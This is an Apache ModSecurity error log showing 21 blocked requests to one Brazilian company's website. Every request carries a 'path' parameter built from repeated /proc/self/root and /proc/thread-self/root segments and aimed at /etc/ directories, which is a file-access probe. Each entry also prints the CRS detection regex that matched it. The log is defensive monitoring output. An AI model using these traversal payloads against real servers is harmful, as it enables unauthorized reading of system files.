[Mon Mar 16 14:37:16.132953 2026] [:error] [pid 14895:tid 140411632822016] [client 74.7.243.203:58560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_zFajLEzk2WiQ-10cTgAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:37:16.600467 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.241.46:51864] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_zJqj1wV0Si-Okef4qQAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:17.879143 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.241.46:51874] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_zbABkC4fWIHEf8H5KAAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:19.115202 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.241.46:51742] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_z3jZBu2q05ozVU9kCgAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:21.674929 2026] [:error] [pid 14895:tid 140411708356352] [client 74.7.241.46:51758] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_0VajLEzk2WiQ-10cUAAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:23.096877 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.241.46:51764] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_03jZBu2q05ozVU9kDwAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:25.688048 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.241.46:51766] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_1aQpVkWug9HeOt8_5AAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:27.314475 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:51772] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_1_9ocpUE4ed4uDz5fQAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:31.898678 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.241.46:37610] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_27ABkC4fWIHEf8H5MAAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:33.322416 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.241.46:37618] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_3XjZBu2q05ozVU9kFQAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:34.521110 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.241.46:37624] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_3rysWC90G-1nBrBOIgAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:35.856977 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.241.46:37628] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_37ABkC4fWIHEf8H5MQAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:40.570734 2026] [:error] [pid 14895:tid 140411691570944] [client 74.7.241.46:37644] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_5FajLEzk2WiQ-10cWQAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:41.915011 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:44074] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_5bysWC90G-1nBrBOKAAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:45.407087 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:44080] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_6bABkC4fWIHEf8H5OAAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:45.704301 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.243.203:58570] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_6aTCbgAP5jq5Teg2IQAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:37:47.983369 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.241.46:44086] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_66TCbgAP5jq5Teg2JAAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:50.465488 2026] [:error] [pid 14895:tid 140411683178240] [client 74.7.241.46:50926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_7VajLEzk2WiQ-10cXgAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:51.807125 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:50938] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_7_9ocpUE4ed4uDz5ggAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:54.167434 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:50944] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_8v9ocpUE4ed4uDz5hgAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:55.512105 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.241.46:50956] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_8_9ocpUE4ed4uDz5iQAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
